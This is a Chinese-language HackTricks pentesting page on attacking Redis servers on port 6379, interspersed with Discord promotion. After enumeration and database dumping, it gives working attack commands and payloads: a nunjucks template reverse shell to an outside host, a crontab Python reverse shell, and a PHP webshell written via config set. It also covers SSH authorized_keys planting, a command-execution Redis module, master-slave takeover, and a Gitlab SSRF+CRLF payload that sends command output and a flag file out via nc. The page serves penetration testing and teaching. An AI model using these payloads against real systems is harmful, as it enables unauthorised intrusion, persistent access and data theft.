Chinese - Ht
HackTricks Training Twitter Linkedin Sponsor

6379 - Pentesting Redis

支持 HackTricks

加入 HackenProof Discord 服务器,与经验丰富的黑客和漏洞赏金猎人交流!

黑客见解 参与深入探讨黑客的刺激与挑战的内容

实时黑客新闻 通过实时新闻和见解,跟上快速变化的黑客世界

最新公告 了解最新的漏洞赏金计划和重要平台更新

今天就加入我们的 Discord,与顶尖黑客开始合作吧!

基本信息

来自 文档:Redis 是一个开源(BSD 许可),内存中的 数据结构存储,用作 数据库、缓存和消息代理。

默认情况下,Redis 使用基于纯文本的协议,但您必须记住,它也可以实现 ssl/tls。了解如何 在这里运行带有 ssl/tls 的 Redis

默认端口: 6379

PORT     STATE SERVICE  VERSION
6379/tcp open  redis   Redis key-value store 4.0.9

自动枚举

一些可以帮助从 Redis 实例获取信息的自动化工具:

nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server

手动枚举

横幅

Redis 是一个 基于文本的协议,你可以直接 在套接字中发送命令,返回的值将是可读的。还要记住,Redis 可以使用 ssl/tls 运行(但这很奇怪)。

在一个常规的 Redis 实例中,你可以直接使用 nc 连接,或者你也可以使用 redis-cli

nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools

您可以尝试的第一个命令是**info。它可能返回包含Redis实例信息的输出**,或者返回类似以下内容

-NOAUTH Authentication required.

在这种情况下,这意味着您需要有效的凭据才能访问Redis实例。

Redis身份验证

默认情况下,Redis可以不需要凭据进行访问。然而,它可以被配置为仅支持密码或用户名 + 密码。 可以在_redis.conf文件中使用参数requirepass设置密码或临时,直到服务重启,连接到它并运行:config set requirepass p@ss$12E45 此外,可以在redis.conf_文件中的参数masteruser中配置用户名

如果仅配置了密码,则使用的用户名是"default"。 另外,请注意无法从外部找到Redis是否仅配置了密码或用户名+密码。

在这种情况下,您将需要找到有效的凭据以与Redis进行交互,因此您可以尝试暴力破解如果您找到了有效的凭据,您需要在建立连接后使用以下命令进行身份验证

AUTH <username> <password>

有效凭据将会返回: +OK

认证枚举

如果Redis服务器允许匿名连接或您已获得有效凭据,您可以使用以下命令启动服务的枚举过程:

INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]

其他 Redis 命令 可以在这里找到 这里.

请注意,实例的 Redis 命令可以在 redis.conf 文件中重命名或删除。例如,这一行将删除命令 FLUSHDB:

rename-command FLUSHDB ""

有关安全配置Redis服务的更多信息,请访问:https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04

您还可以使用命令**monitor实时监控执行的Redis命令**,或使用**slowlog get 25获取25个最慢的查询**。

在这里找到更多有趣的Redis命令信息:https://lzone.de/cheat-sheet/Redis

转储数据库

在Redis中,数据库是从0开始的数字。您可以在命令info的“Keyspace”部分的输出中找到是否有人在使用:

或者您可以通过以下方式获取所有键空间(数据库):

INFO keyspace

在该示例中,数据库 0 和 1 正在使用中。数据库 0 包含 4 个键,数据库 1 包含 1 个。默认情况下,Redis 将使用数据库 0。为了导出例如数据库 1,您需要执行:

SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]

在运行 GET <KEY> 时,如果出现以下错误 -WRONGTYPE Operation against a key holding the wrong kind of value,这可能是因为该键的类型不是字符串或整数,需要使用特殊操作符来显示它。

要知道键的类型,请使用 TYPE 命令,下面是列表和哈希键的示例。

TYPE <KEY>
[ ... Type of the Key ... ]
LRANGE <KEY> 0 -1
[ ... Get list items ... ]
HGET <KEY> <FIELD>
[ ... Get hash item ... ]

# If the type used is weird you can always do:
DUMP <key>

使用 npm 导出数据库 redis-dump 或 python redis-utils

加入 HackenProof Discord 服务器,与经验丰富的黑客和漏洞赏金猎人交流!

黑客见解 参与深入探讨黑客的刺激与挑战的内容

实时黑客新闻 通过实时新闻和见解,跟上快速变化的黑客世界

最新公告 了解最新的漏洞赏金计划和重要平台更新

今天就加入我们 Discord,与顶尖黑客开始合作!

Redis RCE

交互式 Shell

redis-rogue-server 可以在 Redis(<=5.0.5) 中自动获取交互式 shell 或反向 shell。

./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ACCACKER_IP>

PHP Webshell

来自这里的信息。你必须知道网站文件夹路径

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK

​如果 webshell 访问异常,您可以在备份后清空数据库并重试,记得恢复数据库。

模板 Webshell

与前一节一样,您还可以覆盖一些将被模板引擎解释的 html 模板文件,从而获得 shell。

例如,按照 这篇文章,您可以看到攻击者在 nunjucks 模板引擎 解释的 html 中注入了一个 rev shell:

{{ ({}).constructor.constructor(
"var net = global.process.mainModule.require('net'),
cp = global.process.mainModule.require('child_process'),
sh = cp.spawn('sh', []);
var client = new net.Socket();
client.connect(1234, 'my-server.com', function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});"
)()}}

注意 多个模板引擎会将 模板缓存到 内存中,因此即使你覆盖了它们,新的模板也 不会被执行。在这种情况下,要么开发者保持了自动重载的状态,要么你需要对服务进行 DoS 攻击(并期望它会自动重新启动)。

SSH

示例 来自这里

请注意 config get dir 的结果可能会在其他手动利用命令后发生变化。建议在登录 Redis 后立即运行它。在 config get dir 的输出中,你可以找到 redis 用户家目录(通常是 /var/lib/redis/home/redis/.ssh),知道这一点后,你就知道可以在哪里写入 authenticated_users 文件以通过 ssh 以 redis 用户身份 访问。如果你知道其他有效用户的家目录并且你有可写权限,你也可以利用它:

  1. 在你的电脑上生成一个 ssh 公私钥对:ssh-keygen -t rsa

  2. 将公钥写入文件:(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt

  3. 将文件导入 redis:cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key

  4. 将公钥保存到 redis 服务器上的 authorized_keys 文件中:

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /var/lib/redis/.ssh
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK

  1. 最后,你可以使用私钥 ssh 连接到 redis 服务器ssh -i id_rsa redis@10.85.0.52

此技术在这里自动化: https://github.com/Avinash-acid/Redis-Server-Exploit

Crontab

root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK

最后一个示例适用于 Ubuntu,对于 Centos,上述命令应为:redis-cli -h 10.85.0.52 config set dir /var/spool/cron/

此方法也可以用来赚取比特币:yam

加载 Redis 模块

  1. 按照 https://github.com/n0b0dyCN/RedisModules-ExecuteCommand 的说明,您可以 编译一个 redis 模块以执行任意命令

  2. 然后您需要某种方式来 上传编译好的 模块。

  3. 在运行时加载上传的模块,使用 MODULE LOAD /path/to/mymodule.so

  4. 列出已加载的模块,以检查是否正确加载:MODULE LIST

  5. 执行 命令

127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999

  1. 随时卸载模块:MODULE UNLOAD mymodule

LUA 沙箱绕过

这里 您可以看到 Redis 使用命令 EVAL 来执行 沙箱中的 Lua 代码。在链接的帖子中,您可以看到 如何滥用它 使用 dofile 函数,但 显然 这不再可能。无论如何,如果您可以 绕过 Lua 沙箱,您可以 在系统上执行任意 命令。此外,从同一帖子中,您可以看到一些 导致 DoS 的选项

一些 CVE 用于逃离 LUA

主从模块

主 Redis 的所有操作会自动同步到从 Redis,这意味着我们可以将漏洞 Redis 视为从 Redis,连接到我们自己控制的主 Redis,然后我们可以向自己的 Redis 输入命令。

master redis : 10.85.0.51 (Hacker's Server)
slave  redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld

SSRF 与 Redis 通信

如果您可以发送 明文 请求 到 Redis,您可以 与其通信,因为 Redis 会逐行读取请求,并仅对它不理解的行返回错误:

-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
-ERR unknown command 'Accept:'
-ERR unknown command 'Accept-Encoding:'
-ERR unknown command 'Via:'
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'

因此,如果您在网站中发现了一个 SSRF vuln,并且您可以 控制 一些 headers(可能通过 CRLF vuln)或 POST 参数,您将能够向 Redis 发送任意命令。

示例:Gitlab SSRF + CRLF 到 Shell

Gitlab11.4.7 中发现了一个 SSRF 漏洞和一个 CRLF。该 SSRF 漏洞存在于 从 URL 导入项目功能 中,在创建新项目时允许以 [0:0:0:0:0:ffff:127.0.0.1] 的形式访问任意 IP(这将访问 127.0.0.1),而 CRLF 漏洞则通过在 URL 中添加 %0D%0A 字符来利用。

因此,可以 利用这些漏洞与管理来自 gitlab 的队列的 Redis 实例进行通信,并利用这些队列 获得代码执行。Redis 队列滥用有效载荷是:

multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec

并且URL编码请求滥用SSRFCRLF来执行whoami并通过nc发送回输出的内容是:

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git

出于某种原因(正如 https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ 的作者所述)利用git方案而不是http方案成功。

加入 HackenProof Discord 服务器,与经验丰富的黑客和漏洞赏金猎人交流!

黑客见解 参与深入探讨黑客的刺激与挑战的内容

实时黑客新闻 通过实时新闻和见解,跟上快速变化的黑客世界

最新公告 了解最新的漏洞赏金计划和重要平台更新

今天就加入我们的 Discord,与顶尖黑客开始合作!

支持 HackTricks
Previous6000 - Pentesting X11Next8009 - Pentesting Apache JServ Protocol (AJP)

Last updated